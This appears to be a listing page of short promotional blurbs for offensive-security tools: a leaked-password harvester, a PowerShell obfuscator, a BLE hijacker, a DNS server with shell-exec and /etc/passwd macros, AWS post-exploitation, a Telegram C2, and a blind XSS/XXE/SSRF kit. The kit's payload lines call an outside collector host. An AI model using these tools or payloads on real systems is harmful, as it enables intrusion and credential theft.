EMAGNET : Leaked Databases With 97.1% Accurate To Grab Mail + Password
Emagnet is a very powerful tool for it's purpose which is to capture email addresses and passwords from leaked databases uploaded on pastebin. It's almost impossible to find leaked passwords when they are out of list on pastebin.com. Either they have been deleted by pastebin's techs or the uploads is just one in the crowd. To be honest it's...
PyFuscation : Obfuscate Powershell Scripts By Replacing Function Names, Variables & Parameters
PyFuscation is a obfuscate powershell scripts by replacing Function names, Variables and Parameters. It Requires python3. Usage PyFuscation.py Also Read - Barq: The AWS Cloud Post Exploitation Framework Optional arguments: -h, --help show this help message and exit-f Obfuscate functions ○ Do this First … Its probably the most likely to...
Btlejack : Bluetooth Low Energy Swiss-Army Knife
Btlejack provides everything you need to sniff, jam and hijack Bluetooth Low Energy devices. It relies on one or more BBC Micro:Bit. Devices running a dedicated firmware. You may also want to use an Adafruit's Bluefruit LE sniffer or a nRF51822 Eval Kit, as we added support for these devices. Current version of this tool (2.0) supports BLE 4.x and 5.x. The BLE 5.x...
mpDNS : Multi-Purpose DNS Server 2019
mpDNS aka multi-purpose DNS server is a simple, configurable "clone & run" DNS server with multiple useful features. Should work on Python 2 and 3names.db -> holds all custom records (see examples)Simple wildcards like *.example.comCatch unicode dns requestsCustom actions aka macro:{{shellexec::dig google.com +short}} -> Execute shell command and respond with result{{eval::res = '1.1.1.%d' % random.randint(0,256)}} -> Evaluate your python code{{file::/etc/passwd}} -> Respond with...
Ehtools : Penetration Tools That Can Be Explored Easily
Wi-Fi tools keep getting more and more accessible to beginners, and the Ehtools Framework is a framework of serious penetration tools that can be explored easily from within it. This powerful and simple tool can be used for everything from installing new add-ons to grabbing a WPA handshake in a matter of seconds. Plus, it's easy to install, ...
Wordlister : A Simple Wordlist Generator & Mangler Written In Python
Wordlister is a simple wordlist generator and mangler written in python. It makes use of python multiprocessing capabilities in order to speed up his job (CPU intensive). Supported Permutations Capital Upper 1337 Append Prepend Additional Functions Test/Dry run Multiprocessing Multicore Possibility to adjust cores/processes number manually. Each generated password doesn't contain same word twice. Also Read - HashCatch : Capture Handshakes Of Nearby WiFi Networks Automatically Preview sage: wordlister.py --input INPUT --perm...
Barq: The AWS Cloud Post Exploitation Framework
Barq is a post-exploitation framework that allows you to easily perform attacks on a running AWS infrastructure. It allows you to attack running EC2 instances without having the original instance SSH keypairs. It also allows you to perform enumeration and extraction of stored Secrets and Parameters in AWS. Prerequisites An existing AWS account access key id and secret (Token too...
Telegra Csharp C2 : Command and Control for C# Writing
Telegra Csharp C2 is a tool for command and control for C# Writing. TelegramBotClient allows you to use a proxy for Bot API connections. VirusTotal check result Don't pass it on to Virus Total anymore. I've tried it for you. Install Nuget download these package using System.IO;using Telegram.Bot;using Telegram.Bot.Args;using Telegram.Bot.Types.InputFiles;using AForge.Video;using AForge.Controls;using AForge.Video.DirectShow; Also Read - Nuages : A Modular C2 Framework 2019 Add related...
Http Request Smuggler : Extension For Burp Suite
This is an extension for Burp Suite designed to help you launch HTTP Request Smuggler attacks, originally created during HTTP Desync Attacks research. It supports scanning for Request Smuggling vulnerabilities, and also aids exploitation by handling cumbersome offset-tweaking for you. Install Http Request Smuggler The easiest way to install this is in Burp Suite, via Extender -> BApp Store. If you prefer to load the...
B-XSSRF : Toolkit To Detect & Keep Track On Blind XSS, XXE & SSRF
B-XSSRF is a toolkit to detect and keep track on Blind XSS, XXE & SSRF. Read More - RedHunt OS : Virtual Machine for Adversary Emulation & Threat Hunting SETUP Upload the files to your server.Create a Database and upload database.sql file to it.Change the DB Credentials in db.php file.Ready. USAGE BLIND XSS <embed src="http://mysite.com/bxssrf/request.php"><script src="http://mysite.com/bxssrf/request.php"> BLIND XXE <?xml version="1.0" ?><!DOCTYPE root ><r> SSRF GET /testssrf.php=http://mysite.com/bxssrf/request.php DEFAULT CREDENTIALS USER : admin@test.com PASS : 123456 Download